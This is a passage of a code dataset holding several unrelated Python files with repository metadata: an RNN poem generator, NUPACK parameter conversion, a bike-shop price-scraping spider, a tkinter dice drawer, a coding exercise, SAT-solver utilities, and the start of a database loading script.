recurrent_initializer='glorot_uniform'),\n tf.keras.layers.Dense(vocab_size)\n ])\n return model\n\n\ndef chunks(arr, n):\n \"\"\"Yield successive n-sized chunks from lst.\"\"\"\n for i in range(0, len(arr), n):\n if (len(arr[i:i + n]) >= n):\n yield arr[i:i + n]\n\n\n\ndef split_input_target(chunk): # for the example: hello\n input_text = chunk[:-1] # hell\n target_text = chunk[1:] # ello\n return input_text, target_text # hell, ello\n\n\n\n\n\ndef main():\n path_to_file = \"./poem_dataset.csv\"\n print('load dataset')\n raw_data = pd.read_csv(path_to_file, encoding=\"utf-8\")\n data = raw_data.copy()\n\n # parse content\n print('Parse content')\n text = ''\n for i, row in data.iterrows():\n text += row['Content']\n\n vocab = sorted(set(text))\n\n corpus = []\n char2idx = {u: i for i, u in enumerate(vocab)}\n idx2char = np.array(vocab)\n\n def int_to_text(ints):\n try:\n ints = ints.numpy()\n except:\n pass\n return ''.join(idx2char[ints])\n\n def text_to_int(text):\n return np.array([char2idx[c] for c in text])\n\n for _, row in data.iterrows():\n corpus.append(text_to_int(row['Content']))\n\n seq_length = 100\n\n text_as_int = []\n for row in corpus:\n chks = list((chunks(row, seq_length + 1)))\n text_as_int.append(chks)\n\n flatten_text_as_int_n1 = np.array(text_as_int).flatten()\n flatten_text_as_int_n2 = 
[np.array(flattened).flatten() for flattened in flatten_text_as_int_n1]\n flatten_text_as_int = np.array(flatten_text_as_int_n2).flatten().flatten()\n flat_list = [item for sublist in flatten_text_as_int_n2 for item in sublist]\n\n char_dataset = tf.data.Dataset.from_tensor_slices(flat_list)\n sequences = char_dataset.batch(seq_length + 1, drop_remainder=True)\n\n dataset = sequences.map(split_input_target) # we use map to apply the function to every entry\n\n # Time to model\n BATCH_SIZE = 64\n VOCAB_SIZE = len(vocab) # vocab is number of unique characters\n EMBEDDING_DIM = 256\n RNN_UNITS = 1024\n\n # Buffer size to shuffle the dataset\n # (TF data is designed to work with possibly infinite sequences,\n # so it doesn't attempt to shuffle the entire sequence in memory. Instead,\n # it maintains a buffer in which it shuffles elements).\n BUFFER_SIZE = 10000\n\n data = dataset.shuffle(BUFFER_SIZE).batch(BATCH_SIZE, drop_remainder=True)\n\n model = build_model(VOCAB_SIZE, EMBEDDING_DIM, RNN_UNITS, BATCH_SIZE)\n\n def loss(labels, logits):\n return tf.keras.losses.sparse_categorical_crossentropy(labels, logits, from_logits=True)\n\n model.compile(optimizer='adam', loss=loss)\n checkpoint_dir = './training_checkpoints'\n # Name of the checkpoint files\n checkpoint_prefix = os.path.join(checkpoint_dir, \"ckpt_{epoch}\")\n\n checkpoint_callback=tf.keras.callbacks.ModelCheckpoint(\n filepath=checkpoint_prefix,\n save_weights_only=True)\n\n history = model.fit(data, epochs=1, callbacks=[checkpoint_callback])\n\n model = build_model(VOCAB_SIZE, EMBEDDING_DIM, RNN_UNITS, batch_size=1)\n\n model.load_weights(tf.train.latest_checkpoint(checkpoint_dir))\n model.build(tf.TensorShape([1, None]))\n\n def generate_text(model, start_string):\n # Evaluation step (generating text using the learned model)\n\n # Number of characters to generate\n num_generate = 800\n\n # Converting our start string to numbers (vectorizing)\n input_eval = [char2idx[s] for s in start_string]\n input_eval = tf.expand_dims(input_eval, 0)\n\n # Empty string to store our results\n text_generated = []\n\n # Low temperatures results in more predictable text.\n # Higher temperatures results in more surprising text.\n # Experiment to find the best setting.\n temperature = 1.05\n\n # Here batch size == 1\n model.reset_states()\n for i in range(num_generate):\n predictions = model(input_eval)\n # remove the batch dimension\n\n predictions = tf.squeeze(predictions, 0)\n\n # using a categorical distribution to predict the character returned by the model\n predictions = predictions / temperature\n predicted_id = tf.random.categorical(predictions, num_samples=1)[-1, 0].numpy()\n\n # We pass the predicted character as the next input to the model\n # along with the previous hidden state\n input_eval = tf.expand_dims([predicted_id], 0)\n\n text_generated.append(idx2char[predicted_id])\n\n return start_string + ''.join(text_generated)\n\n inp = input(\"Type a starting string: \")\n print(generate_text(model, inp))\n\nif __name__ == \"__main__\":\n main()","repo_name":"vgrangep/poem_generator","sub_path":"generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":5262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"37270262634","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom collections import defaultdict\nfrom typing import List, Tuple\nfrom datetime import datetime\nimport os\nimport itertools\n\nfrom . 
import fileio, util, plotting\n\nparam_name_dict = {'dH':'dH', 'dG':'dG_37'}\n\n\"\"\" Helper Functions \"\"\"\ndef add_2_dict_val(mydict, value):\n for key in mydict:\n mydict[key] += value\n return mydict\n \ndef get_dict_mean_val(mydict):\n return np.nanmean(list(mydict.values()))\n\ndef center_new_param(old_dict, new_dict, verbose=False):\n \"\"\"\n Can only center one layer deep. If nested dictionary, need to call\n this function separately for each category you want to center\n Returns:\n new_dict - centered `new_dict`\n \"\"\"\n try:\n target_mean = np.mean([old_dict[k] for k in new_dict if k in old_dict])\n fitted_mean = get_dict_mean_val(new_dict)\n \n new_dict = add_2_dict_val(new_dict, -1 * fitted_mean)\n new_dict = add_2_dict_val(new_dict, target_mean)\n\n if verbose:\n print('\\tMean value of old_dict is %.3f' % target_mean)\n print('\\tMean value of fitted new_dict is %.3f' % fitted_mean)\n print('\\tMean value of centered new_dict is %.3f\\n' % get_dict_mean_val(new_dict))\n except:\n pass\n return new_dict\n \n\"\"\" Formatting Functions \"\"\"\n\ndef update_template_dict(template_dict, coef_dict):\n \"\"\" \n Overwrite tempate_dict with values in coef_dict\n Up to 2 levels deep as in the parameter file\n \"\"\"\n ignored_keys = ['name', 'type', 'material', 'references', 'time_generated']\n new_dict = template_dict.copy()\n for param in template_dict:\n if not param in ignored_keys:\n if isinstance(template_dict[param], List) and param in coef_dict:\n new_dict[param] = coef_dict[param]\n elif isinstance(template_dict[param], dict):\n for key in template_dict[param]:\n if key in coef_dict[param] and not (key in ignored_keys): \n if isinstance(coef_dict[param][key], dict):\n for p,v in coef_dict[param][key].items():\n new_dict[param][key][p] = v\n else:\n new_dict[param][key] = coef_dict[param][key]\n \n return new_dict\n\n \n\ndef coef_df_2_dict(coef_df, template_dict=None,\n center_new_parameters=False):\n \"\"\"\n Convert lr.coef_df to a NUPACK style dictionary\n without modifying the contents\n \"\"\"\n coef_dict = defaultdict(dict)\n for _,row in coef_df.iterrows():\n pclass, pname = row.name.split('#')\n coef_dict[pclass][pname] = row.values[0]\n \n # Convet numerical keys & values to lists\n for key, sub_dict in coef_dict.items():\n if isinstance(sub_dict, dict):\n inds = list(sub_dict.keys())\n if inds[0].isdigit():\n inds = [int(x) for x in inds]\n if template_dict is None:\n new_values = np.zeros(np.max(inds))\n else:\n new_values = template_dict[key].copy()\n \n for ind, value in sub_dict.items():\n new_values[int(ind)-1] = value\n coef_dict[key] = list(new_values)\n \n # Overwrite tempate_dict\n if not template_dict is None:\n if center_new_parameters:\n print('Centering new parameters...')\n for p_group in coef_dict:\n if p_group in template_dict:\n print('group', p_group)\n coef_dict[p_group] = center_new_param(old_dict=template_dict[p_group], \n new_dict=coef_dict[p_group], verbose=True)\n \n new_dict = update_template_dict(template_dict, coef_dict)\n else:\n new_dict = coef_dict\n \n return new_dict\n \n \ndef coef_dict_2_df(coef_dict):\n \"\"\"\n NUPACK style dict to lr.coef_df style\n Args:\n coef_dict - param_set_dict['dH'] level\n \"\"\"\n flat_coef_dict = defaultdict()\n for pclass in coef_dict:\n if not pclass in ['name', 'type', 'material', 'references', 'time_generated']:\n if isinstance(coef_dict[pclass], list):\n for i,value in enumerate(coef_dict[pclass]):\n coef_name = '%s#%d' % (pclass, i+1)\n flat_coef_dict[coef_name] = value\n elif 
isinstance(coef_dict[pclass], float):\n flat_coef_dict[pclass] = coef_dict[pclass]\n else:\n for pname in coef_dict[pclass]:\n try:\n coef_name = pclass + '#' + pname\n flat_coef_dict[coef_name] = coef_dict[pclass][pname]\n except:\n print(coef_name)\n else:\n pass\n \n return pd.DataFrame(index=['value'], data=flat_coef_dict).T\n \n \ndef get_fixed_params(param_set_template_file:str, fixed_pclass:List[str],\n features_not_fixed:List[str]=None, return_full_coef_df=False) -> Tuple[pd.DataFrame, List[str]]:\n \"\"\"\n Gets the params in `param_set_template_file` that starts with a str in `fixed_pclass`.\n Returns:\n fixed_coef_df - dataframe, contains the values for the fixed parameters\n return_full_coef_df - if True, return all coef. Useful for regularized fitting with prior\n \"\"\"\n param_set_dict = fileio.read_json(param_set_template_file)\n \n ori_coef_df = pd.concat((coef_dict_2_df(param_set_dict['dH']), coef_dict_2_df(param_set_dict['dG'])), axis=1)\n ori_coef_df.columns = ['dH', 'dG']\n\n if return_full_coef_df:\n fixed_coef_df = ori_coef_df.copy()\n else:\n fixed_coef_df = ori_coef_df.loc[[x for x in ori_coef_df.index if x.split('#')[0] in fixed_pclass]]\n if features_not_fixed is not None:\n fixed_coef_df.drop(labels=features_not_fixed, inplace=True)\n \n fixed_coef_df.fillna(0, inplace=True)\n fixed_feature_names = fixed_coef_df.index.tolist()\n \n return fixed_coef_df, fixed_feature_names\n \n\"\"\" Convert parameters between different models \"\"\"\n\ndef get_hairpin_seq_df(lr:util.LinearRegressionSVD, param:str, loop_len:int=3) -> pd.DataFrame:\n \"\"\"\n Converts `feature_list.get_feature_list()` style hairpin parameters \n to nupack hairpin_triloop or hairpin_tetraloop style parameters\n \"\"\"\n loop_mid_param = lr.coef_df.loc[[x for x in lr.coef_df.index if x.endswith('_'+'.'*loop_len)]]\n hairpinmm_param = lr.coef_df.loc[[x for x in lr.coef_df.index if (x.endswith('_(.+.)') and (not x.startswith('x')))]]\n\n full_loop_list = []\n param_list = []\n for loop_mid in loop_mid_param.index:\n loop_mid_seq = loop_mid.split('_')[0]\n for hairpinmm in hairpinmm_param.index:\n # hairpinmm - 'NN+NN_(.+.)'\n nt1, nt2 = hairpinmm[1], hairpinmm[3]\n hairpinmm_seq = hairpinmm.split('_')[0]\n if nt1 == loop_mid_seq[0] and nt2 == loop_mid_seq[-1]:\n full_triloop = hairpinmm_seq[0] + loop_mid_seq + hairpinmm_seq[-1]\n full_loop_list.append(full_triloop)\n param_list.append(loop_mid_param.loc[loop_mid][0] + hairpinmm_param.loc[hairpinmm][0])\n\n loop_df = pd.DataFrame(index = full_loop_list, data=param_list, columns=[param])\n return loop_df\n \n \ndef get_hairpin_mismatch(lr:util.LinearRegressionSVD):\n \"\"\"\n Formats `feature_list.get_feature_list()` style hairpin_mismatch `NN+NN_(.+.)`\n to NUPACK style\n Args:\n \n Returns:\n Dict, equivalent to `hairpin_dict['dH']['hairpin_mismatch']`\n \"\"\"\n def convert_mm_name(x):\n seq = x.split('_')[0]\n return seq[-2:] + seq[:2]\n \n hairpinmm_param = lr.coef_df.loc[[x for x in lr.coef_df.index if (x.endswith('_(.+.)') and (not x.startswith('x')))]]\n hairpinmm_param.index = [convert_mm_name(x) for x in hairpinmm_param.index]\n param = hairpinmm_param.keys()[0]\n return hairpinmm_param.to_dict()[param]\n \n \ndef get_adjusted_triloop_terminal_penalty(hairpin_triloop_dict, terminal_penalty_dict):\n \"\"\"\n Called by `lr_dict_2_nupack_json()`\n \"\"\"\n for key,value in hairpin_triloop_dict.items():\n closing_pair = key[0] + key[-1]\n terminal_penalty = terminal_penalty_dict[closing_pair]\n hairpin_triloop_dict[key] = value - 
terminal_penalty\n \n return hairpin_triloop_dict\n \n \n \ndef lr_dict_2_nupack_json(lr_dict:util.LinearRegressionSVD, template_file:str, out_file:str, \n lr_step:str='full', center_new_parameters=False,\n adjust_triloop_terminal_penalty:bool=True,\n extract_hairpin_mismatch:bool=False, comment=''):\n \"\"\"\n Formats and saves the parameters from the final regression object to \n NUPACK json file\n Args:\n lr_dict - Dict, keys 'dH' and 'dG', \n values are instances of the LinearRegressionSVD() class\n lr_step - str, {'hairpin', 'full'}. If hairpin, only update the hairpin seq params\n center_parameter - bool, if True, center the newly fitted parameters to the template category\n adjust_trilop_terminal_penalty - bool, only used when lr_step = 'hairpin', adjust the \n terminal penalty off the hairpin_triloop parameters\n extract_hairpin_mismatch - bool, if True, fit hairpin_mismatch parameters from triloop \n and tetraloop parameters\n \"\"\"\n param_name_dict = {'dH':'dH', 'dG':'dG_37'}\n \n ori_param_set_dict = fileio.read_json(template_file)\n param_set_dict = defaultdict()\n \n if lr_step == 'full':\n # Only centering new parameters here once as the ones in populated loopup tables are already \n # built on the centered ones\n for p in param_name_dict:\n param_set_dict[p] = coef_df_2_dict(lr_dict[p].coef_df, template_dict=ori_param_set_dict[p],\n center_new_parameters=center_new_parameters)\n if 'intercept#intercept' in lr_dict[p].coef_df.index:\n param_set_dict[p]['intercept'] = lr_dict[p].coef_df.at['intercept#intercept', lr_dict[p].coef_df.columns[0]]\n\n param_set_dict = update_template_dict(ori_param_set_dict, param_set_dict)\n \n ### Populate the lookup tables ###\n for p in param_name_dict:\n coef_p_dict = coef_df_2_dict(lr_dict[p].coef_df)\n \n # `interior_n1_n2` (mismatches)\n for n1, n2 in [(1,1), (1,2), (2,2)]:\n interior_name = 'interior_%d_%d' % (n1, n2)\n for seq in param_set_dict[p][interior_name]:\n seq1, seq2 = seq[:n1+2], seq[n1+2:]\n mm1 = seq2[-2] + seq2[-1] + seq1[0] + seq1[1]\n mm2 = seq1[-2] + seq1[-1] + seq2[0] + seq2[1]\n new_value = param_set_dict[p]['interior_size'][n1+n2-1] + \\\n param_set_dict[p]['interior_mismatch'][mm1] + \\\n param_set_dict[p]['interior_mismatch'][mm2]\n if n1 == 1 and n2 == 1:\n mm_stacks = seq1[0] + seq1[-1] + seq2[0] + seq2[-1]\n try:\n new_value += coef_p_dict['interior_mismatch_stacks'][mm_stacks]\n except:\n pass\n param_set_dict[p][interior_name][seq] = new_value\n \n loop_size_dict = dict(triloop=3, tetraloop=4)\n for loop_size in loop_size_dict:\n hairpin_name = 'hairpin_' + loop_size\n \n loop_seqs = [''.join(x) + util.rcompliment(x[0]) # iterate all possible loop sequences\n for x in itertools.product(list('ATCG'), repeat=loop_size_dict[loop_size] + 1)]\n for seq in loop_seqs:\n hp_mm = seq[-2:] + seq[:2]\n loop_mid = seq[2:-2]\n # `hairpin_loop_mid` is an intermediate parameter not in the final file\n hp_value = coef_p_dict['hairpin_loop_mid'][loop_mid]\n if loop_size == 'triloop':\n # NUPACK adds hairpin_mismatch on top of hairpin_tetraloop but not for triloop\n # sort of funny\n # also takes out terminal penalty\n hp_value += param_set_dict[p]['hairpin_mismatch'][hp_mm]\n hp_value -= param_set_dict[p]['terminal_penalty'][seq[-1]+seq[0]]\n \n param_set_dict[p][hairpin_name][seq] = hp_value\n \n elif lr_step == 'hairpin':\n hairpin_dict = {'dH': dict(hairpin_triloop=None, hairpin_tetraloop=None),\n 'dG': dict(hairpin_triloop=None, hairpin_tetraloop=None)}\n \n for p in param_name_dict:\n if extract_hairpin_mismatch:\n mm_dict 
= get_hairpin_mismatch(lr_dict[p])\n # hairpin_dict[p]['hairpin_mismatch'] = center_new_param(ori_param_set_dict[p]['hairpin_mismatch'], new_dict=mm_dict)\n\n hairpin_dict[p]['hairpin_tetraloop'] = get_hairpin_seq_df(lr_dict[p], p, loop_len=4).to_dict()[p]\n hairpin_dict[p]['hairpin_triloop'] = get_hairpin_seq_df(lr_dict[p], p, loop_len=3).to_dict()[p]\n \n if adjust_triloop_terminal_penalty:\n hairpin_dict[p]['hairpin_triloop'] = get_adjusted_triloop_terminal_penalty(\n hairpin_dict[p]['hairpin_triloop'], ori_param_set_dict[p]['terminal_penalty'])\n \n # for hairpin_p in ['hairpin_triloop', 'hairpin_tetraloop']:\n # hairpin_dict[p][hairpin_p] = center_new_param(ori_param_set_dict[p][hairpin_p], \n # hairpin_dict[p][hairpin_p])\n \n param_set_dict = update_template_dict(ori_param_set_dict, hairpin_dict)\n \n now = datetime.now()\n current_time = now.strftime(\"%Y-%m-%dT%H:%M:%S\")\n param_set_dict['time_generated'] = current_time\n param_set_dict['comment'] = comment\n param_set_dict['name'] = os.path.split(out_file)[1].replace('.json', '')\n \n fileio.write_json(param_set_dict, out_file)\n\n\n\"\"\" Plotting functions \"\"\"\n\ndef plot_mupack_nupack(data, x_suffix, param, lim, color_by_density=False):\n fig, ax = plt.subplots(1,2,figsize=(4,2))\n kwargs = dict(show_cbar=False, lim=lim, color_by_density=color_by_density)\n plotting.plot_colored_scatter_comparison(data=data, x=param+x_suffix, y=param+'_MUPACK', \n ax=ax[0], **kwargs)\n plotting.plot_colored_scatter_comparison(data=data, x=param+x_suffix, y=param+'_NUPACK_salt_corrected', \n ax=ax[1], **kwargs)\n mae = defaultdict()\n mae['new'] = util.mae(data[param+x_suffix], data[param+'_MUPACK'])\n mae['original'] = util.mae(data[param+x_suffix], data[param+'_NUPACK_salt_corrected'])\n ax[0].set_title('MAE = %.2f' % mae['new'])\n ax[1].set_title('MAE = %.2f' % mae['original'])\n plt.tight_layout()\n\n\n","repo_name":"keyuxi/nnn_paper","sub_path":"nnn/mupack.py","file_name":"mupack.py","file_ext":"py","file_size_in_byte":15337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20537085537","text":"import re\r\nimport os\r\n\r\nfrom scrapy.spider import BaseSpider\r\nfrom scrapy.selector import HtmlXPathSelector\r\nfrom scrapy.http import Request, FormRequest, HtmlResponse\r\nfrom scrapy.utils.response import get_base_url\r\nfrom scrapy.utils.url import urljoin_rfc\r\nfrom urllib import urlencode\r\nimport hashlib\r\n\r\nimport csv\r\nfrom product_spiders.items import Product, ProductLoaderWithNameStrip as ProductLoader\r\nfrom product_spiders.utils import extract_price\r\nfrom scrapy import log\r\nfrom scrapy.shell import inspect_response\r\n\r\nfrom urlparse import urljoin\r\n\r\nimport itertools\r\nimport json\r\nimport copy\r\n\r\nHERE = os.path.abspath(os.path.dirname(__file__))\r\n\r\nclass CellbikesSpider(BaseSpider):\r\n name = 'cellbikes.com.au'\r\n # download_delay = 1\r\n allowed_domains = ['cellbikes.com.au']\r\n # start_urls = ['http://www.cellbikes.com.au/']\r\n start_urls = ['http://www.cellbikes.com.au/c.980629/ShopFlow/sc.environment.ssp?v=4&lang=en_AU&cur=AUD']\r\n brands = []\r\n\r\n # Multiple options\r\n # http://www.cellbikes.com.au/Santini-H2O-Winter-Booties\r\n # GET options json\r\n # http://www.cellbikes.com.au/api/items?include=facets&fieldset=details&language=en&country=AU¤cy=AUD&pricelevel=5&c=980629&n=3&url=Santini-H2O-Winter-Booties\r\n # 
http://www.cellbikes.com.au/api/items?include=facets&fieldset=details&language=en&country=AU¤cy=AUD&pricelevel=5&c=980629&n=3&id=18593\r\n # \r\n\r\n def parse(self, response):\r\n # inspect_response(response, self)\r\n # return\r\n if 'SC.ENVIRONMENT.CATEGORIES = {' in response.body:\r\n data = '{' + response.body.split('SC.ENVIRONMENT.CATEGORIES = {', 1)[1].split('};', 1)[0] + '}'\r\n j = json.loads(data)\r\n self.brands = [d['itemid'] for d in j['brands']['categories'].values()]\r\n\r\n yield Request('http://www.cellbikes.com.au/', callback=self.parse_home)\r\n\r\n def parse_home(self, response):\r\n # inspect_response(response, self)\r\n # yield Request('http://www.cellbikes.com.au/Bikes/BEST_Fixies_UNDER_500?order=custitem_best_selling:desc&page=2', callback=self.parse_products_list)\r\n # yield Request('http://www.cellbikes.com.au/Santini-H2O-Winter-Booties', callback=self.parse_product)\r\n # yield Request('http://www.cellbikes.com.au/Castelli-Rosso-Corsa-6in-Sock', callback=self.parse_product)\r\n # return\r\n hxs = HtmlXPathSelector(response)\r\n tmp = hxs.select('//ul[@class=\"nav\"]/li[last()]/ul//a/text()').extract()\r\n if tmp:\r\n self.brands = [s.strip() for s in tmp[:-1]] + self.brands\r\n for link in hxs.select('//ul[@class=\"nav\"]/li[position() 3:\r\n tmp = tmp[-3:]\r\n for s in tmp:\r\n loader.add_value('category', s)\r\n # shipping_cost\r\n shipping_cost = '9.90'\r\n\r\n # stock\r\n if not price:\r\n loader.add_value('stock', 0)\r\n else:\r\n tmp = hxs.select('//span[contains(@class,\"stock-status\")]/text()').extract()\r\n if tmp and 'Out' in tmp[0]:\r\n loader.add_value('stock', 0)\r\n else:\r\n loader.add_value('stock', 1)\r\n\r\n product = loader.load_item()\r\n # options = hxs.select('//ul[contains(@id,\"option-custcol\")]/li/a').extract()\r\n # if not options:\r\n # yield product\r\n # return\r\n tmp = hxs.select('//meta[@itemprop=\"url\"]/@content').extract()\r\n if product['price']<=99:\r\n product['shipping_cost'] = shipping_cost\r\n\r\n if not tmp:\r\n yield product\r\n return\r\n else:\r\n # process options\r\n if tmp[0].startswith('/'):\r\n tmp[0] = tmp[0][1:]\r\n if tmp[0].startswith('product/'):\r\n tmp[0] = tmp[0][8:]\r\n url = 'http://www.cellbikes.com.au/api/items?include=facets&fieldset=details&language=en&country=AU¤cy=AUD&pricelevel=5&c=980629&n=3&id=%s' % tmp[0]\r\n else:\r\n url = 'http://www.cellbikes.com.au/api/items?include=facets&fieldset=details&language=en&country=AU¤cy=AUD&pricelevel=5&c=980629&n=3&url=%s' % tmp[0]\r\n yield Request(url, meta={'product':product}, callback=self.parse_options)\r\n\r\n def parse_options(self, response):\r\n # inspect_response(response, self)\r\n # return\r\n product = response.meta['product']\r\n j = json.loads(response.body)\r\n if not j['items']:\r\n yield product\r\n return\r\n fields = [d.get('sourcefrom', '') for d in j['items'][0]['itemoptions_detail']['fields']]\r\n fields = [d for d in fields if d]\r\n if not fields:\r\n yield product\r\n return\r\n # process options\r\n for d in j['items'][0]['matrixchilditems_detail']: # ##\r\n item = copy.deepcopy(product)\r\n item['identifier'] = d['internalid']\r\n # item['sku'] = d['internalid']\r\n # item['name'] = d['itemid']\r\n keys = [re.search(r'custitem\\d+', k).string for k in d.keys() if re.search(r'custitem\\d+', k)]\r\n if keys:\r\n item['name'] += ' - ' + '-'.join([str(d[k]) for k in keys])\r\n if not item.get('brand', None):\r\n for brand in self.brands:\r\n if brand.lower() in d['itemid'].lower():\r\n item['brand'] = brand\r\n break\r\n\r\n price = 
extract_price(str(d['onlinecustomerprice_detail']['onlinecustomerprice']))\r\n item['price'] = price\r\n\r\n if item['price']<=99:\r\n item['shipping_cost'] = '9.90'\r\n\r\n if d[\"showoutofstockmessage\"]:\r\n item['stock'] = 0\r\n else:\r\n item['stock'] = 1\r\n yield item\r\n","repo_name":"Godsoo/scraping","sub_path":"e-commerce/CompetitorMonitor/product_spiders/spiders/crc_au/cellbikes.py","file_name":"cellbikes.py","file_ext":"py","file_size_in_byte":8456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"40864315149","text":"from tkinter import *\nimport random\n\nroot = Tk()\n\ncanvas = Canvas(root,width = 800,height = 800)\ncanvas.pack()\n\ndef circle(x,y,radius,fill):\n canvas.create_oval(x - radius,y - radius,x + radius,y + radius,fill = fill)\n\nclass Dice:\n def __init__(self):\n self.sides = 6\n def roll(self):\n self.num = 5#random.randint(1,self.sides)\n print(self.num)\n if self.num % 2 == 1:\n self.size = 800/((self.num - 1)/2)\n else:\n self.size = 800/(self.num/2)\n i = 0\n while i < self.num:\n canvas.create_line(0,self.size * i,800,self.size*i,width = 10)\n if i == 0 and self.num % 2 == 1:\n circle(400,400,50,fill = \"black\")\n\n elif (self.num - i )% 2 == 0:\n circle(self.size/2,self.size/4 + self.size*((i/2)) + self.size/4,self.size/8,\"black\")\n\n elif (self.num - i )% 2 == 1:\n circle(800 - self.size/2,800 - (self.size/4 + self.size*((i/2))) + self.size/4 + 0,self.size/8,\"black\")\n i += 1\ndice = Dice()\ndice.roll()\n\nroot.mainloop()\n","repo_name":"MaxwellMarcus/bumpingSquares","sub_path":"dice.py","file_name":"dice.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41740305756","text":"n=int(input())\nnumbers=list(map(int,input().split(\" \")))\nsymbols=list(map(int,input().split(\" \")))\nanswers=[]\n\ndef calculate(last_num,symbols,index):\n\tif(n==index):\n\t\tanswers.append(last_num)\n\t\treturn ;\n\telse:\n\t\tfor i in range(0,4):\n\t\t\tif(symbols[i]!=0):\n\t\t\t\tsymbols[i]=symbols[i]-1\n\t\t\t\tif(i==0):\n\t\t\t\t\tcalculate(last_num+numbers[index],symbols,index+1)\n\t\t\t\t\tsymbols[i]=symbols[i]+1\n\t\t\t\telif(i==1):\n\t\t\t\t\tcalculate(last_num-numbers[index],symbols,index+1)\n\t\t\t\t\tsymbols[i]=symbols[i]+1\n\t\t\t\telif(i==2):\n\t\t\t\t\tcalculate(last_num*numbers[index],symbols,index+1)\n\t\t\t\t\tsymbols[i]=symbols[i]+1\n\t\t\t\telif(i==3):\n\t\t\t\t\tlast_num_fixed= last_num>0 and last_num//numbers[index] or (abs(last_num)//numbers[index])*-1\n\t\t\t\t\tcalculate(last_num_fixed,symbols,index+1)\n\t\t\t\t\tsymbols[i]=symbols[i]+1\n\ncalculate(numbers[0],symbols,1)\nprint(max(answers),min(answers))","repo_name":"weightsforfun/forCodingTest","sub_path":"100june/ictstudy/week2/14888.py","file_name":"14888.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19787759051","text":"import argparse\nimport logging\nimport os\nimport pdb\nimport random\nfrom collections import namedtuple, defaultdict\nfrom os.path import join\n\nimport numpy as np\nimport scipy.sparse as sparse\nimport torch\nimport yaml\n\nlogger = logging.getLogger(__name__)\n\nDataSample = namedtuple('DataSample', ['filename', 'formula', 'adj', 'sat'])\n\n\ndef setup():\n parser = argparse.ArgumentParser()\n parser.add_argument('-c', '--config_path', type=str, required=True)\n parser.add_argument('-g', '--gpu', 
type=int, default=None)\n args = parser.parse_args()\n\n with open(args.config_path) as f:\n config_data = f.read()\n config = yaml.load(config_data)\n\n config['dir'] = join('results', config['name'])\n os.makedirs(config['dir'], exist_ok=True)\n\n log_file = join(config['dir'], 'train.log')\n logging.basicConfig(\n handlers=[logging.FileHandler(log_file, mode='w'), logging.StreamHandler()],\n format='%(asctime)s %(levelname)s %(message)s',\n datefmt='%H:%M:%S',\n )\n logger.setLevel(getattr(logging, config['log_level'].upper()))\n\n logger.info('Configuration:\\n' + config_data)\n\n if config['seed']:\n random.seed(config['seed'])\n np.random.seed(config['seed'])\n torch.manual_seed(config['seed'])\n\n use_gpu = args.gpu is not None and torch.cuda.is_available()\n device = torch.device(f'cuda:{args.gpu}' if use_gpu else 'cpu')\n logger.info(f'Device: {device}')\n\n config['no_eval'] = not config['eval_set']\n\n config = defaultdict(lambda: None, config)\n return config, device\n\n\ndef adj_sign(n, m, occur):\n i = np.repeat(range(n), [len(lst) for lst in occur])\n j = np.concatenate(occur)\n v = np.ones(len(i), dtype=np.int64)\n return sparse.coo_matrix((v, (i, j)), shape=(n, m))\n\n\ndef adj(f):\n n, m, occur = f.n_variables, len(f.clauses), f.occur_list\n adj_pos = adj_sign(n, m, occur[1 : n + 1])\n adj_neg = adj_sign(n, m, occur[:n:-1])\n return (adj_pos, adj_neg)\n\n\ndef adj_batch(adjs, fstack):\n adjp, adjn = list(zip(*adjs))\n return fstack((sparse.block_diag(adjp), sparse.block_diag(adjn)))\n\n\ndef to_sparse_tensor(x):\n x = x.tocoo()\n i = torch.tensor(np.vstack((x.row, x.col)), dtype=torch.int64)\n v = torch.tensor(x.data, dtype=torch.float32)\n return torch.sparse_coo_tensor(i, v, torch.Size(x.shape))\n\n\ndef init_edge_attr(k):\n return torch.cat(\n (\n torch.tensor([1, 0], dtype=torch.float32).expand(k, 2),\n torch.tensor([0, 1], dtype=torch.float32).expand(k, 2),\n ),\n dim=0,\n )\n\n\ndef normalize(x):\n return 2 * x - 1\n\n\ndef unnormalize(x):\n return (x + 1) / 2\n","repo_name":"emreyolcu/sat","sub_path":"code/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2634,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"32"} +{"seq_id":"18279890393","text":"import sqlalchemy as db\nimport configparser\nfrom sqlalchemy import orm\nfrom sys import argv\nfrom sys import exit\nimport pandas as pd\nfrom classes.lolparser import LolParser\nimport math\nimport time\nimport datetime\nimport numpy as np\nimport pymysql\nimport os\nimport json\n\n# this script is gonna parse through the json table, get our info, and backfill our table.\nconfig = configparser.ConfigParser()\nconfig.read('./resources/python/general.cfg')\n\ndb_host = config.get('DATABASE', 'db_id')\ndb_user = config.get('DATABASE', 'db_user')\ndb_pw = config.get('DATABASE', 'db_password')\ndb_name = config.get('DATABASE', 'db_name')\n\nengine = db.create_engine('mysql+pymysql://{}:{}@{}/{}'.format(db_user, db_pw, db_host, db_name), pool_size=100, max_overflow = 100)\nconnection = engine.connect()\nmetadata = db.MetaData()\nsm = orm.sessionmaker(bind=engine, autoflush=True, autocommit=False, expire_on_commit=True)\n\nteam_data_table = db.Table('team_data', metadata, autoload=True, autoload_with=engine)\n\nold_data = {} \n\nselect_old_data = \"SELECT * FROM team_data;\"\nold_data = pd.read_sql(select_old_data, LolParser.connection)\n\nnew_data = {}\n\nselect_new_data = \"SELECT * FROM json_data;\"\nnew_data = pd.read_sql(select_new_data, 
